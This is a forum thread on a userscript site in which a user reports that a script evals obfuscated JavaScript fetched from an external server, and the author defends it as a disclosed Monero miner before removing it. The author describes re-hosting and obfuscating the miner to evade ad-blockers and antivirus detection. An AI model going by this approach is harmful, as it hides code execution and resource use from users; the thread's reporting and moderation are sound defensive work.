Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

External, base64-encoded, obfuscated, and minified JavaScript

About: Gamdom Rain Notifier [Preview]
This script makes ajax request to get base64-encoded text which is prefixed by eval, decodeURIComponent, escape, and atob method names. And then it calls eval on the text (line https://greasyfork.org/en/scripts/38993-gamdom-rain-notifier/code#n74) resulting in obfuscated and minified script. url of ajax request - https://www.gamdomrain.com/voteme/xxx.js

Comments

  • It's a Monero miner to pay hosting and server cots.
    It only uses between 25-35% CPU.
    It's said at the script description.
    If you don't like using a little bit of CPU only when the script is running, don't use it.
    And as I said: it's for paying hosting and server costs. ¿Don't like it? Don't use it. Simple.
  • AllInRed said:

    It's a Monero miner to pay hosting and server cots.
    It only uses between 25-35% CPU.
    It's said at the script description.
    If you don't like using a little bit of CPU only when the script is running, don't use it.
    And as I said: it's for paying hosting and server costs. ¿Don't like it? Don't use it. Simple.

    And, that code it's not made by me, it's auto-generated by the "miner" website.
    I just reuploaded to my own server after asking them for permission, in order to avoid adblockers.
    You can see the "original" script here: https://cdn.minescripts.info/c/g9lx_2.js
    And as I said: it's for paying server and hosting costs. Don't want to use a little of your CPU, don't use it.
    It's said at the script description. And by using it, you're accepting that you will use it a little bit of the CPU only when using the script, you will not get CPU usage if you don't use the script, only when using it. Simple.
  • edited March 2018 Chrome
    And, textual words of JasonBarnabe, Greasyfork creator:


    <<As long as it's mentioned in the description, scripts that include a miner are OK (but feel free to rate them accordingly...)>>.
    (he said that here: https://greasyfork.org/en/forum/discussion/comment/41344/#Comment_41344).

    It's mentioned in my script description? Yes.
    So you actually don't have reason to report.
  • Oh, man. I am actually following the rules. And this is my reason to report.
  • Oh, man. I am actually following the rules. And this is my reason to report.

    Well, but as JasonBarnabe said: <<As long as it's mentioned in the description, scripts that include a miner are OK>>.
    So, yes, the script is obfuscated and minified and that things, but it's not even obfuscated by me, it's obfuscated because that's how the website I used to get the miner generates it. All the other things my script uses are not obfuscated or minified. And, as I said it multiple times, it's to pay hosting and servers costs, I don't even get "profit" for me, because the hashrate it generates just reaches for paying the server and the hosting monthly, and if I get some "profit" for me, are cents, because I don't generate so much as for having for server & hosting and at the same time for me.
  • Sigh, there is no garantee that the loaded script isn't malware. Again, read the rules:
    One of the core principles of Greasy Fork is that the user must be able to inspect the code in a script. External scripts can bypass this principle in a number of ways: they can change without warning or history, they can serve up different code to different people, and they can be used to hide malicious code in the middle of known libraries. Even if someone were to check an external script and determine it to be legitimate, that would be no guarantee that that script always has been or always will be legitimate.
  • Sigh, there is no garantee that the loaded script isn't malware. Again, read the rules:

    One of the core principles of Greasy Fork is that the user must be able to inspect the code in a script. External scripts can bypass this principle in a number of ways: they can change without warning or history, they can serve up different code to different people, and they can be used to hide malicious code in the middle of known libraries. Even if someone were to check an external script and determine it to be legitimate, that would be no guarantee that that script always has been or always will be legitimate.


    I tried to deobfuscate as maximum as possible in 10mins.
    It's just a "normal miner script"(for saying in some way): https://www.gamdomrain.com/voteme/deobfuscatedone.js

    The only reason that I have to use a obfuscated version is because there are people that use miners as virus using like 90% of user CPU and antivirus added miners like virus, and as I said so many time: it's to pay hosting and servers costs and I don't have any reason to put any type of malware inside that script.
  • AllInRed said:


    I tried to deobfuscate as maximum as possible in 10mins.
    It's just a "normal miner script"(for saying in some way): https://www.gamdomrain.com/voteme/deobfuscatedone.js

    The only reason that I have to use a obfuscated version is because there are people that use miners as virus using like 90% of user CPU and antivirus added miners like virus, and as I said so many time: it's to pay hosting and servers costs and I don't have any reason to put any type of malware inside that script.

    Anyhow, this is external script that doesn't comply with the existing rules for external scripts. And still not clear code - https://www.gamdomrain.com/voteme/deobfuscatedone.js
  • edited March 2018 Chrome



    AllInRed said:


    I tried to deobfuscate as maximum as possible in 10mins.
    It's just a "normal miner script"(for saying in some way): https://www.gamdomrain.com/voteme/deobfuscatedone.js

    The only reason that I have to use a obfuscated version is because there are people that use miners as virus using like 90% of user CPU and antivirus added miners like virus, and as I said so many time: it's to pay hosting and servers costs and I don't have any reason to put any type of malware inside that script.

    Anyhow, this is external script that doesn't comply with the existing rules for external scripts. And still not clear code - https://www.gamdomrain.com/voteme/deobfuscatedone.js
    Even so, it's not my fault how the miner website(called coin-have.com, but they host scripts on minescripts.info) made the script. I just use it order to pay server and hosting costs. If they made it obfuscated it's not my fault.
  • As the author of the script you must follow the rules, and you are responsible for what does your script do, and what the external scripts it runs. At the same time you say that it's not your fault that your script runs external script that doesn't comply with the rules ... sigh
  • edited March 2018 Chrome
    AllInRed said:



    AllInRed said:


    I tried to deobfuscate as maximum as possible in 10mins.
    It's just a "normal miner script"(for saying in some way): https://www.gamdomrain.com/voteme/deobfuscatedone.js

    The only reason that I have to use a obfuscated version is because there are people that use miners as virus using like 90% of user CPU and antivirus added miners like virus, and as I said so many time: it's to pay hosting and servers costs and I don't have any reason to put any type of malware inside that script.

    Anyhow, this is external script that doesn't comply with the existing rules for external scripts. And still not clear code - https://www.gamdomrain.com/voteme/deobfuscatedone.js
    Even so, it's not my fault how the miner website(called coin-have.com, but they host scripts on minescripts.info) made the script. I just use it order to pay server and hosting costs. If they made it obfuscated it's not my fault.
    By the way,

    Proof of the control panel wich shows how many is the script generating, a proof that it's just a mining script and not malware: https://i.gyazo.com/6ca4ef6fc70fd74d3a79aa2b1185beff.png (the one with 453 hashes and almost 0.35XMR won it's the miner script that it's used)

    Proof that the script is obfuscated by them and not by me: https://i.gyazo.com/9cd69969457f7d016095f4238c305310.png
    (P.S: The _2 suffix, wich is the obfuscated one, I know it because after speaking to their telegram '@browserminer' with the coin-have co-owner, he said me that adding a _2 would make a no-antivirus blocked mining script, proof of that: https://i.gyazo.com/953370c8e5537202681eb341b45c651d.png).

    Just a simple miner script. No malware. Just to pay hosting and server costs. I just use it on my script, saying it on the description, and it's not my fault that it's obfuscated.
  • edited March 2018 Chrome

    As the author of the script you must follow the rules, and you are responsible for what does your script do, and what the external scripts it runs. At the same time you say that it's not your fault that your script runs external script that doesn't comply with the rules ... sigh

    So you want me to give a script for free that needs a server and website to run(both of them cost money every month) and pay it all from my pocket and losing some of my money for offering something for free so users can enjoy it?

    Nice.
  • edited March 2018 Chrome

    As the author of the script you must follow the rules, and you are responsible for what does your script do, and what the external scripts it runs. At the same time you say that it's not your fault that your script runs external script that doesn't comply with the rules ... sigh

    And there isn't any mining script that it's not obfuscated/minified in some way, even coinhive is obfuscated and minified.
  • The way you've added 'the external script' doesn't comply with the rules, and there is no garantee that the loaded script isn't malware.
  • Sigh, guy. Do it according the rules, and then everything will be OK.
  • edited March 2018 Chrome

    The way you've added 'the external script' doesn't comply with the rules, and there is no garantee that the loaded script isn't malware.

    A garantee of that is not malware is that the "re-uploaded" miner script to my website(gamdomrain.com) is equal to the one hosted at minescripts.info cdn(managed by coin-have.com). And coin-have having money invested on two domains(coin-have.com and minescripts.info) and a VPS used as miner running websocket(wss://ws.pzoifaum.info), and a VPS for mining needs a nice RAM and so many cores, they probably pay around 150$ or even more only for monthly costs.
    I don't think it would be necessary for them to put any type of malware, and after checkend for a long time the decoded script I wasn't able to find any type of malware on it. It's a fork of "coinhive.min.js", wich has no virus(it's detected by antivirus only because many people use javascript miners badly, putting such a high amount of CPU usage and/or running them on your computer without your knowing). While my "re-uploaded" script(I have permission of coin-have admin to re-upload to my site in order to skip extensions like "No-coin") keeps the same as "https://cdn.minescripts.info/c/g9lx_2.js"(it's easily checkable by downloading both of them and uploading to a diff checker website), it's 99,999% possible that isn't malware, because coin-have having already some fame(not as coinhive, but it has some) I don't think they will add malware, it would be strange to happen and it it reachs to happen(thing wich I doubt) they would be discovered soon, and also after talking with the admin, he seems a "cool guy".
    So the <<there is no garantee that the script is not malware>> it's not so true, maybe there is a 0,001% chance that it becomes malware, but I doubt.
    So meanwhile the "re-uploaded" script keeps the same, almost 0% malware risk...Yes, the script they made it's obfuscated and blah blah blah, but it's just a normal miner script, coinhive fork(coinhive source here: https://github.com/cazala/coin-hive). So almost no malware risk. Already used some few months, even in my own computer, and never got malware/virus/trojan...
    And also, the only thing for which I need to re-upload file to my own host it's just to avoid blacklists of the minescripts.info domain, not to put malware into it
  • If you said that it isn't malware, then it doesn't mean that it is realy not malware, it only means that you said that it isn't. I mean, guy, read the rules again, and again, especially these words:
    Even if someone were to check an external script and determine it to be legitimate, that would be no guarantee that that script always has been or always will be legitimate.
  • If you said that it isn't malware, then it doesn't mean that it is realy not malware, it only means that you said that it isn't. I mean, guy, read the rules again, and again, especially these words:

    Even if someone were to check an external script and determine it to be legitimate, that would be no guarantee that that script always has been or always will be legitimate.
    That it's obfuscated/minified doesn't mean it's malware.
    As I'm already tired of getting emails like "remove miner for free" probably I'm going to delete this miner script from my script and put it on the gamdomrain website where this script runs and end of the story.
  • edited March 2018 Firefox
    What's wrong with you? Why can't you understand that the way on which you realise an external script loading allows to load completely different scripts on each run without any changes to the main script (aka Gamdom Rain Notifier) posted on Greasy Fork. And even if someone were to check an external script and determine it to be legitimate, that would be no guarantee that that script always has been or always will be legitimate. - Why can't you understand these words?
    In your case, in order to determine an external script to be legitimate (say, not malware), one MUST check it every time before the main script (Gamdom Rain Notifier) run. And there's no garantee that the external script loaded on the next time isn't malware.
  • What's wrong with you? Why can't you understand that the way on which you realise an external script loading allows to load completely different scripts on each run without any changes to the main script (aka Gamdom Rain Notifier) posted on Greasy Fork. And even if someone were to check an external script and determine it to be legitimate, that would be no guarantee that that script always has been or always will be legitimate. - Why can't you understand these words?
    In your case, in order to determine an external script to be legitimate (say, not malware), one MUST check it every time before the main script (Gamdom Rain Notifier) run. And there's no garantee that the external script loaded on the next time isn't malware.

    I said I'll remove from the script itself because I'm tired of receiving "remove miner" emails and I will put it onto website.
    I have removed it permanently of the other script because the page where the other script works has changed its header about 1 week ago in a way it doesn't accept XHR to sites that aren't "whitelisted", so on that script I'll remove it permanently.

    I will remove also from this script but I'm going to put it on the website.
    And putting on the website can be a proof of 0 malware, because for the moment the site is listed at google, and google delists website that its "crawler bots" detect malware, and these "crawler bots" normally run at least 1-2 times every week, and you can't exactly know when.
  • Removed this miner from the script itself. Happy now?
  • This looks OK now, but I would like to reiterate:

    1. Your description must describe what the script does. If it includes a miner, you need to say so.
    2. External JS outside of the whitelist is not allowed.
This discussion has been closed.